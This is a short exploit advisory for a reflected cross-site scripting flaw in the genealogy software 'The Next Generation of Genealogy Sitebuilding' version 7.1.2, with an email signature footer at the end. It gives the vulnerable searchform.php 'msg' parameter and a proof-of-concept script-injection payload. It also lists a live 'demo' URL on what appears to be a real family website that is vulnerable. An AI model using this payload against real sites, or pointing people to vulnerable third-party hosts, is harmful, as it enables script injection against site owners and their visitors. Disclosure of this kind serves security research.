______     __     ______             
               /\  == \   /\ \   /\  __ \   
               \ \  __<   \ \ \  \ \ \/\ \  
                \ \_____\  \ \_\  \ \_____\ 
                 \/_____/   \/_/   \/_____/ 
                            

[#]----------------------------------------------------------------[#]
# 
# [x] Target: The Next Generation of Genealogy Sitebuilding  [XSS]
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com    
# [x] Download: http://lythgoes.net/genealogy/software.php
# [x] Version: 7.1.2
# [x] Price: $29.99 USD
# [x] Thanks: packetdeath
#  
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit : 
#   
#    http://localhost/searchform.php?msg=[XSS]
#
# [x] Poc : 
#    
#   http://localhost/searchform.php?msg=searchform.php?msg="/><script>alert('XSS')</script>
#   
[#]------------------------------------------------------------------------------------------[#]
#
#  Demo : 
# 
#  [+] http://horwitzfam.org/searchform.php?msg="/><script>alert('XSS')</script>
#  
#  
[#]-------------------------------------------------------------------------------------------[#]

#EOF
 		 	   		  
_________________________________________________________________
Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you.
http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_3:092010